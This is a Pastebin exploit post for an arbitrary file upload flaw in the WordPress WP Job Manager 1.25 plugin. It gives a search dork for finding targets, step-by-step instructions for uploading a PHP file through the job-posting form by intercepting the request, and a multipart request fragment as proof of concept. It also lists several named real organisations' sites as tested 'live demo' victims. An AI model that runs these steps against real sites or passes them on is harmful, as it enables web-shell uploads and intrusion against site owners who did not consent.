Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ######################
- # Exploit Title : Wordpress WP Job Manager 1.25 Arbitrary File Upload Vulnerability
- # Exploit Author : xBADGIRL21
- # Dork : go here https://cxsecurity.com/issue/WLB-2016070087 or http://0day.today/exploit/description/25667
- # Software link : http://downloads.wordpress.org/plugin/wp-job-manager.latest-stable.zip
- # Vendor Homepage : https://wpjobmanager.com/
- # version : 1.25.0
- # Tested on: [ Windows ]
- # skype:xbadgirl21
- # Date: 2016/07/11
- # video Proof : https://youtu.be/nx-WtfdOkLc
- ######################
- # [+] DESCRIPTION :
- ######################
- # [+] WP Job Manager is a lightweight plugin for adding job-board functionality to your WordPress site.
- # [+] An arbitrary file upload web vulnerability has been detected in the WP Job Manager 1.25 and below.
- # [+] The vulnerability allows remote attackers to upload arbitrary files within the wordpress upload directory
- ######################
- # [+] USAGE :
- ######################
- # 1.- SELECT A WEBSITE FROM THE DORK ABOVE
- # 2.- GO TO POST A JOB URL <HOST><WP-PATH>/post-a-job/ [or] Look for it
- # 3.- Fill all the Fields No need to Register or Preview Then in Logo upload your FILE.jpg
- # 4.- Using Tamper Data or HTTP LIVE Headers change your FILE.TXT OR PHP
- # 5.- Go to url "http(s)://<wp-host>/<wp-path>/wp-content/uploads/job-manager-uploads/company_logo/<Year/month>/<your-file-name>"
- ######################
- # [+] Poc :
- ######################
- # -----------------------------18132430516394\r\n
- # Content-Disposition: form-data; name="script"\r\n
- # \r\n
- # true\r\n
- # -----------------------------18132430516394\r\n
- # Content-Disposition: form-data; name="company_logo"; filename="x.txt"\r\n
- # Content-Type: image/jpeg\r\n
- # \r\n
- ######################
- # [+] Test :
- ######################
- # http://sala.sk.ca/wp-content/uploads/job-manager-uploads/company_logo//2016//07/xx.txt
- # http://www.ruralhumanservices.org/wp-content/uploads/job-manager-uploads/company_logo/2016//07/xx.txt
- ######################
- # [+] File Path :
- ######################
- # http(s)://<wp-host>/<wp-path>/wp-content/uploads/job-manager-uploads/company_logo/2016//07/x.txt
- ######################
- # [+] Live Demo :
- ######################
- # http://www.ruralhumanservices.org/post-a-job/
- # http://sala.sk.ca/post-a-job/
- # http://www.elmundodeltransporte.com/publica-una-oferta-laboral
- #
- ######################
- # Discovered by : xBADGIRL21
- # Greetz : All Mauritanien Hackers - NoWhere
- #######################
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement